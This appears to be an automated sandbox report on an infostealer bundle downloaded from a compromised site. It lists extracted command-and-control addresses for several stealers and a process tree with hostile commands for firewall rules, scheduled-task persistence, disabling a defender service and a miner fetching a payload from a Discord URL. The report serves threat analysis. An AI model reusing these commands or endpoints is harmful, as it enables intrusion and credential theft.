Analysis
-
max time kernel
625s -
max time network
631s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
21-04-2024 11:34
Errors
General
-
Target
https://salonvinsvicto.com/wp-content/folder/server/v4_x64_x86.rar
Malware Config
Extracted
risepro
147.45.47.93:58709
Extracted
stealc
http://185.172.128.23
-
url_path
/f993692117a3fda2.php
Extracted
vidar
https://steamcommunity.com/profiles/76561199673019888
https://t.me/irfail
-
user_agent
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Extracted
vidar
RoInitialize
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.50:33080
Extracted
lumma
https://greetclassifytalk.shop/api
https://productivelookewr.shop/api
https://tolerateilusidjukl.shop/api
https://shatterbreathepsw.shop/api
https://shortsvelventysjo.shop/api
https://incredibleextedwj.shop/api
https://alcojoldwograpciw.shop/api
https://liabilitynighstjsko.shop/api
https://demonstationfukewko.shop/api
Extracted
socks5systemz
http://bpguwiu.com/search/?q=67e28dd8690ff779115daa4d7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4be8889b5e4fa9281ae978a771ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ffc17c9e6909c32
http://bpguwiu.com/search/?q=67e28dd8690ff779115daa4d7c27d78406abdd88be4b12eab517aa5c96bd86ec9d8e48825a8bbc896c58e713bc90c91e36b5281fc235a925ed3e04d6bd974a95129070b616e96cc92be510b866db52b2e34aec4c2b14a82966836f23d7f210c7ee969c32c46a901f
Signatures
-
Detect Vidar Stealer 6 IoCs
-
Detect ZGRat V1 2 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 3 IoCs
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Modifies firewall policy service 2 TTPs 2 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Stealc
Stealc is an infostealer written in C++.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs 12 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 44 IoCs
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 8 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 48 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Windows security modification 2 TTPs 14 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 46 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 13 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 33 IoCs
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 25 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 16 IoCs
-
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 28 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://salonvinsvicto.com/wp-content/folder/server/v4_x64_x86.rar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://salonvinsvicto.com/wp-content/folder/server/v4_x64_x86.rar2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.0.1727784326\995216389" -parentBuildID 20230214051806 -prefsHandle 1776 -prefMapHandle 1768 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d05a963-3710-4285-8713-3d1f8314728f} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 1868 277aae24f58 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.1.1896130769\1087590238" -parentBuildID 20230214051806 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecb64000-a6bf-41f1-be4f-8bb267042b2e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 2476 2779e189f58 socket3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.2.1830008144\898524734" -childID 1 -isForBrowser -prefsHandle 2772 -prefMapHandle 2728 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1144 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3020f84f-ce8b-4b1a-8e5e-568c845dcef1} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 2868 277add39058 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.3.940926591\786657135" -childID 2 -isForBrowser -prefsHandle 3552 -prefMapHandle 3544 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1144 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1444130-0e43-4c5e-8ab0-064a4bced222} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 3640 277af714c58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.4.1474476681\1751528661" -childID 3 -isForBrowser -prefsHandle 5092 -prefMapHandle 1588 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1144 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6852f846-476f-4fa9-b2a1-de584f51333d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 5108 277b19a9d58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.5.1661465066\1642651365" -childID 4 -isForBrowser -prefsHandle 5252 -prefMapHandle 5256 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1144 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89d85fd3-3b26-4049-b201-e4666dce3a8a} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 5244 277b1b46958 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4588.6.51524928\1129578322" -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5524 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1144 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c4fd6aa-049f-4d73-8ec0-df434e61117e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" 5444 277b1b46358 tab3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap26319:78:7zEvent160151⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap10887:78:7zEvent74701⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\file.exe"C:\Users\Admin\Desktop\file.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\SimpleAdobe\ZOLJC4InVsPabriCvzdYKxnz.exeC:\Users\Admin\Documents\SimpleAdobe\ZOLJC4InVsPabriCvzdYKxnz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L8DDQ.tmp\is-MGA22.tmp"C:\Users\Admin\AppData\Local\Temp\is-L8DDQ.tmp\is-MGA22.tmp" /SL4 $C01E6 "C:\Users\Admin\Documents\SimpleAdobe\ZOLJC4InVsPabriCvzdYKxnz.exe" 4469583 522243⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Grape Berry Studio\grapeberrystudio.exe"C:\Users\Admin\AppData\Local\Grape Berry Studio\grapeberrystudio.exe" -i4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Grape Berry Studio\grapeberrystudio.exe"C:\Users\Admin\AppData\Local\Grape Berry Studio\grapeberrystudio.exe" -s4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\SimpleAdobe\PvE1gKHjOwwszfYBQsyLIYyG.exeC:\Users\Admin\Documents\SimpleAdobe\PvE1gKHjOwwszfYBQsyLIYyG.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\SimpleAdobe\qaJAX6JcoXvCYgrS85y55ypZ.exeC:\Users\Admin\Documents\SimpleAdobe\qaJAX6JcoXvCYgrS85y55ypZ.exe2⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\3282716072.exeC:\Users\Admin\AppData\Local\Temp\3282716072.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\39528612.exeC:\Users\Admin\AppData\Local\Temp\39528612.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r /f4⤵
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /f5⤵
-
C:\Users\Admin\AppData\Local\Temp\909512309.exeC:\Users\Admin\AppData\Local\Temp\909512309.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\sylsplvc.exeC:\Windows\sylsplvc.exe4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\1719632198.exeC:\Users\Admin\AppData\Local\Temp\1719632198.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2629722799.exeC:\Users\Admin\AppData\Local\Temp\2629722799.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\4oGo236ypVflUgKJmV5f7lQZ.exeC:\Users\Admin\Documents\SimpleAdobe\4oGo236ypVflUgKJmV5f7lQZ.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\blrUXgMpFgckIGrrURSn9H2i.exeC:\Users\Admin\Documents\SimpleAdobe\blrUXgMpFgckIGrrURSn9H2i.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 21084⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\tP57bYYL83MgqRry7g66TnKI.exeC:\Users\Admin\Documents\SimpleAdobe\tP57bYYL83MgqRry7g66TnKI.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\tP57bYYL83MgqRry7g66TnKI.exe"C:\Users\Admin\Documents\SimpleAdobe\tP57bYYL83MgqRry7g66TnKI.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\Kvy_TTZgDCKRJ85hgfXW2Sv1.exeC:\Users\Admin\Documents\SimpleAdobe\Kvy_TTZgDCKRJ85hgfXW2Sv1.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 10163⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\htXAxwK0ZPJWEe5XNkIw9rKl.exeC:\Users\Admin\Documents\SimpleAdobe\htXAxwK0ZPJWEe5XNkIw9rKl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\SimpleAdobe\H5aiIne5q2zio4am3h047Tn1.exeC:\Users\Admin\Documents\SimpleAdobe\H5aiIne5q2zio4am3h047Tn1.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\SimpleAdobe\vBSUHWMq1YSWMrUyVPrW5wt0.exeC:\Users\Admin\Documents\SimpleAdobe\vBSUHWMq1YSWMrUyVPrW5wt0.exe2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd492eab58,0x7ffd492eab68,0x7ffd492eab784⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3136 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4200 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4436 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4148 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4008 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1936,i,15719505982844195858,16556588884254049788,131072 /prefetch:84⤵
-
